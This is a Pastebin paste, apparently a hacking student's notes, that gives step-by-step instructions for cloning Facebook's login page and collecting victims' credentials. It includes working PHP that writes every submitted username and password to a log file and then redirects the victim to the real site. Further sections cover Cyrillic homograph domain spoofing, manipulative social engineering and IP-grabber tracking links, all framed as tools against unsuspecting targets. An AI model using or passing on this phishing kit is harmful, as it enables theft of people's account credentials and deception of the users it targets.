Advertisement
LuciferAviSonicX

Untitled

Nov 15th, 2017
143
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.27 KB | None | 0 0
  1. Phishing
  2. --------
  3. Similar to fishing
  4. Where we create a fake page or a fake website, which exactly looks like the authorised and authenticated website. It means my target never knows that he/she is being hacked by hackers.
  5.  
  6.  
  7. Create a Phishhing Page
  8. -----------------------
  9. Step 1 - Open the website for whose page you want to create
  10. Step 2 - Right click ----> View source code
  11. Step 3 - Copy the whole Source Code
  12. Step 4 - Paste the copied source code in notepad
  13. Step 5 - find "action=" --> you will get this link https://www.facebook.com/login.php?login_attempt=1&lwv=110
  14. Step 6 - Delete the link and instead type post.php
  15. Step 7 - Save as ---> index.html
  16. Step 8 - We will create a .php file with the name of post.php which will store the username and password of the target.
  17. Step 9 - We will save both files that is index.html and post.php file on the server and send the link to others. --> C:\\xampp\htdocs
  18.  
  19.  
  20.  
  21. ========
  22. post.php
  23. ========
  24.  
  25. <?php
  26. header ('Location: http://www.facebook.com');
  27. $handle = fopen("log.txt", "a");
  28. foreach($_POST as $variable => $value)
  29. {
  30. fwrite($handle, $variable);
  31. fwrite($handle, "=");
  32. fwrite($handle, $value);
  33. fwrite($handle, "\r\n");
  34. }
  35. fwrite($handle, "\r\n");
  36. fclose($handle);
  37. exit;
  38. ?>
  39.  
  40.  
  41.  
  42.  
  43.  
  44.  
  45. <?php ---> which says i am a php code snippet/file
  46.  
  47. header ('Location: http://www.facebook.com');
  48. ---> after saving the data, user will redirect to the particular website --> http://www.facebook.com
  49. $handle = fopen("log.txt", "a");
  50. --> To create a file, which stores username and password
  51. foreach($_POST as $variable => $value) --> for loop for getting each and every data from the form
  52. {
  53.  
  54. fwrite($handle, $variable); --> will create "username"
  55.  
  56. fwrite($handle, "=");
  57. username=
  58.  
  59. fwrite($handle, $value);
  60. actual username
  61. fwrite($handle, "\r\n");
  62. new line
  63. }
  64.  
  65. fwrite($handle, "\r\n");
  66.  
  67. fclose($handle);
  68. to close log.txt file
  69. exit;
  70. to exit the php file and redirect to location above
  71. ?>
  72.  
  73.  
  74. There are 3 main attributes
  75. 1. read --> r
  76. 2. write --> w
  77. 3. append --> a
  78.  
  79.  
  80. username=abhijeet@gmail.com
  81. password=MyPassword
  82.  
  83. IDN Homographic Attack
  84. ----------------------
  85. There are so many countries and they have so many languages.... But in many languages, they have some characters which are similar to english alphabets.
  86. We replace these similar english alphabets with maching alphabets of different language character.
  87.  
  88. crylic --> а, с, е, о, р, х and у
  89. english -> a, c, e, o, p, x and y
  90.  
  91.  
  92. cyrilic --> dеерikа раdukоnе
  93. english --> deepika padukone
  94.  
  95.  
  96. ASCII --> American Standard Code For Information Interchange
  97.  
  98.  
  99. www.paytm.com
  100. www.Paytⅿ․ⅽOⅿ
  101.  
  102.  
  103. Social Engineering
  104. ------------------
  105. Hacking without coding ----> We learn to hack into human minds and we manipulate them to do our dirty works.
  106.  
  107.  
  108. Temp-mail.org
  109.  
  110. PGP --> Prety Good Privacy
  111. ---------------------------
  112.  
  113. Tracing and Tracking
  114. --------------------
  115. Tracing ---> From where the thing is coming
  116. grabify.com --> as the task
  117. http://www.fuglekos.com/ip-grabber/index.html
  118.  
  119. http://www.fuglekos.com/profile/img/2017-11-15/goku.jpg
  120.  
  121. Tracking
  122. --------
  123. to check who are receiving/reading my send mails.
  124. whoreadme.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement